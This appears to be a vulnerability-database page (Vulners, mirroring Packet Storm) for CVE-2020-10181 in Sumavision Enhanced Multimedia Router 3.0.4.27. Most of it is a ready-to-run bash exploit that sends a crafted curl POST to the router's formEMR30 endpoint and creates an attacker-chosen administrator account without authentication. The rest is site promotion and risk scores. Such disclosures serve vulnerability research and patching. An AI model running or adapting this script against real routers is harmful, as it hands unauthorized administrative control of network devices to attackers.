Lucene search
K

Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery

🗓️ 16 Mar 2020 00:00:00Reported by Miguel Mendez ZType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 104 Views

Enhanced Multimedia Router 3.0.4.27 Cross Site Request Forgery exploit for adding admin use

Related
Code
`# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)  
# Date: 2020-03-05  
# Exploit Author: Miguel Mendez Z.  
# Vendor Homepage: www.sumavision.com  
# Software Link: http://www.sumavision.com/ensite/i.php?id=29  
# Version: EMR 3.0.4.27  
# CVE : CVE-2020-10181  
  
-----------------------Exploit Bash---------------------------  
echo ""  
read -p "Set Hostname: " host  
read -p "Set username: " user  
echo "(The password should be between 6 and 32 in length)"  
read -p "Set password: " pass  
echo  
echo "[+] creating user..."  
sleep 2  
postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0")  
if echo "$postdata" | grep -q "0</html>"; then  
echo "[+] http://$host/frame_en.asp"  
echo "[+] created access($user - $pass)"  
else  
echo "[-] user not created"  
fi  
------------------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2020 00:00Current
0.7Low risk
Vulners AI Score0.7
EPSS0.20551
104